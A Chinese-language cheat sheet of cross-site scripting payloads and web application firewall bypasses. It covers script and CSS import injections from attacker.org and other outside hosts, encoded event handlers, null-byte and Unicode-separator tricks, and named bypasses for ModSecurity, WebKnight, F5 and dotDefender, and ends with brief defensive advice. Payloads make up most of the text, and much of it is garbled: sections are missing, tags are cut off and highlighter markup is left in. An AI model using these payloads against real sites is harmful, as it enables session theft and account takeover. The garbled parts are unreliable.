# 0x01 常规插入及其绕过

## 1 Script 标签

Script 标签可以用于定义一个行内的脚本或者从其他地方加载脚本：
<script src=”http://attacker.org/malicious.js”></script>

## 3 行内样式(Inline style)

/style=[^<]*((expression\s*?[<]?)|(behavior\s*:))[^<]*(?=\>)/Uis

## 4 CSS import

IE 浏览器支持在 CSS 中扩展 JavaScript，这种技术称为动态特性(dynamic properties)。允许攻击者加载一个外部 CSS 样式表是相当危险的，因为攻击者现在可以在原始页面中执行 JavaScript 代码了。
<style>
@import url(“http://attacker.org/malicious.css”);
</style>
malicious.css：
body {
}

<style>
@imp\ort url(“http://attacker.org/malicious.css”);
</style>
IE 浏览器会接受反斜杠，但是我们绕过了过滤器。

## 5 Javascript URL

‘-confirm1-‘

‘-confirm(1)-‘

“><!–

### 3 使用<base>标签

<script>confirm(88199)</script>
<script>prompt(88199)</script>
<script>\u0061\u006C\u0065\u0072\u0074(88199)</script>
<script>document[‘write’](88199);</script>

<form><button

<body
<br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br>
<input autofocus>

<iframe src=”http://0x.lv/xss.swf”></iframe>
<meta http-equiv=”refresh” content=”0;
url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2830%29%3C%2%73%63%72%69%70%74%3E”>
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+></object>

# 0x03 规则探测及绕过

## 1 WAF规则探测

<script>prompt(1);</script>
<script>confirm      (1);</script>

<script src=”http://rhainfosec.com/evil.js”>

## 2 大小写混合字符

2、使用<a>标签测试
<a被过滤？
href被过滤？

HTML5拥有150个事件处理函数，可以多尝试其他函数

## 3 测试其他标签

src属性
<img src=x      onerror=prompt(1);>
<img/src=aaa.jpg      onerror=prompt(1);
<video src=x      onerror=prompt(1);>
<audio src=x      onerror=prompt(1);>
iframe
<iframe/src=”data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==”>
Embed
<embed/src=//goo.gl/nlX0P>
Action
<isindex action=data:text/html, type=image>
mario验证
<span class=”pln”>    </span><span class=”tag”>&lt;formaction</span><span class=”pun”>=</span><span class=”atv”>&amp;#039;data:text&amp;sol;html,&amp;lt;script&amp;gt;alert(1)&amp;lt/script&amp;gt&amp;#039;</span><span class=”tag”>&gt;&lt;button&gt;</span><span class=”pln”>CLICK</span>
“formaction”属性
“background”属性
<table background=javascript:alert(1)></table> // Works on Opera 10.5      and IE6
“posters” 属性
<video poster=javascript:alert(1)//></video> // Works Upto Opera 10.5
“data”属性
<object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=”>
<object/data=//goo.gl/nlX0P?
“code”属性

<marquee/onstart=confirm(2)>/

<q/oncut=open()>

<marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>
<command onmouseover=”\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x6    9\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B”>Save</command>      // Works with IE8

Expression 属性
<img style=”xss:expression(alert(0))”> // Works upto IE7.
<div style=”color:rgb(&#039;&#039;x:expression(alert(1))”></div>      // Works upto IE7.
“location”属性

<meta http-equiv=”refresh”      content=”0;url=//goo.gl/nlX0P”>
<meta content=”&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)” http-equiv=”refresh”/>
[itex]<a xlink:href=”//jsfiddle.net/t846h/”>click // By Ashar Javed
（）；：被过滤
<svg><script>alert&#40/1/&#41</script>      // Works With All Browsers
( is html encoded to &#40
) is html encoded to &#41
Opera的变量
<svg><script>alert&#40      1&#41 // Works with Opera Only

JavaScript是很灵活的语言，可以使用十六进制、Unicode、HTML等进行编码，以下属性可以被编码
href=
action=
formaction=
location=
on*=
name=
background=
poster=
src=
code=
data= //只支持base64

## 4 基于上下文的过滤

WAF最大的问题是不能理解内容，使用黑名单可以阻挡独立的js脚本，但仍不能对xss提供足够的保护，如果一个反射型的XSS是下面这种形式

### 1 输入反射属性

<input value=”XSStest” type=text>

” onmouseover=”prompt(0) x=”

<script>
Var
x=”Input”;
</script>

confirm() ，例如：

### 2 非常规事件监听

DOMfocusin,DOMfocusout,等事件，这些需要特定的事件监听适当的执行。例如：

DOMAttrModified
DOMCharacterDataModified
DOMFocusIn
DOMFocusOut
DOMMouseScroll
DOMNodeInserted
DOMNodeInsertedIntoDocument
DOMNodeRemoved
DOMNodeRemovedFromDocument
DOMSubtreeModified

### 3 超文本内容

<a
href=”Userinput”>Click</a>

### 4 变形

javas&Tab;cript:\u0061lert(1);
javascript:\u0061lert&#x28;1&#x29
IE10以下和URI中可以使用VBScript
Data URl
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

### 5 JSON内容

encodeURIComponent(&#039;userinput&#039;)

-prompt(1)-
-confirm(1)-

encodeURIComponent(&#039;&#039;-prompt(1)-&#039;&#039;)

### 6 输入反射在svg标签内

<svg><script>varmyvar=”YourInput”;</script></svg>

### 7 字符集BUG

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=”><img
src=x onerror=prompt(0);>

### 8 空字节

<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>

### 9 语法BUG

RFC声明中节点名称不能是空格，以下的形式在javascript中不能运行
<//     style=x:expression\28write(1)\29> // Works upto IE7 参考http://html5sec.org/#71
<!–[if]><script>alert(1)</script     –> // Works upto IE9 参考http://html5sec.org/#115
<?xml-stylesheet     type=”text/css”?><root     style=”x:expression(write(1))”/> // Works in IE7 参考 http://html5sec.org/#77
<%div%20style=xss:expression(prompt(1))>     // Works Upto IE7

### 10 Unicode分隔符

[on\w+\s*]这个规则过滤了所有on事件，为了验证每个浏览器中有效的分隔符，可以使用fuzzing方法测试0×00到0xff，结果如下：
IExplorer=     [0x09,0x0B,0x0C,0x20,0x3B]
Chrome =     [0x09,0x20,0x28,0x2C,0x3B]
Safari = [0x2C,0x3B]
FireFox=     [0x09,0x20,0x28,0x2C,0x3B]
Opera = [0x09,0x20,0x2C,0x3B]
Android =     [0x09,0x20,0x28,0x2C,0x3B]
x0b在Mod_security中已经被过滤，绕过的方法：
<a/onmouseover[\x0b]=location=&#039;\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B&#039;>rhainfosec

### 11 缺少X-frame选项

Docmodes
IE引入了doc-mode很长时间，提供给老版本浏览器的后端兼容性，有风险，攻击情景是黑客可以引用你站点的框架，他可以引入doc-mode执行css表达式

<html>
<body>
<meta http-equiv=”X-UA-Compatible” content=”IE=EmulateIE7″ />
<iframesrc=”https://targetwebsite.com”>
</body>
</html>

### 12 Window.name欺骗

POC
<iframesrc=&#039;http://www.target.com?foo=”xss  autofocus/AAAAA  onfocus=location=window.name//&#039;
DOM型XSS

<script>
vari=location.hash;
document.write(i);
</script>

Location.hash[1] = :  // Defined at the first position after     the hash.
Location.hash[2]= (  // Defined at the second position after     the has
Location.hash[3] = ) // Defined     at third position after the hash.

### 13 ModSecurity绕过

<scri%00pt>confirm(0);</scri%00pt>
<a/onmouseover[\x0b]=location=&#039;\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B&#039;>rhainfosec

## 5 WEB KNIGHT绕过

<marquee/onstart=confirm(2)>
F5 BIG IP ASM and Palo ALTO绕过
“/><marquee  onfinish=confirm(123)>a</marquee>
Dot Defender绕过

<marquee/onstart=confirm(2)>

# 0x04结论

1、开发者和管理员要注意WAF只能缓解攻击，并且针对已知的弱点的防护只是和源代码修复的方法打个时间差；
2、要保持WAF的规则库更新；
3、WAF可以配置参数限制，需要提供手册用于配置参数content-length最大最小长度，content-type类型，在入侵时进行告警；

4、如果WAF依据黑名单，要确保可以阻断已知的浏览器BUG，并且相应规则库要及时更新。

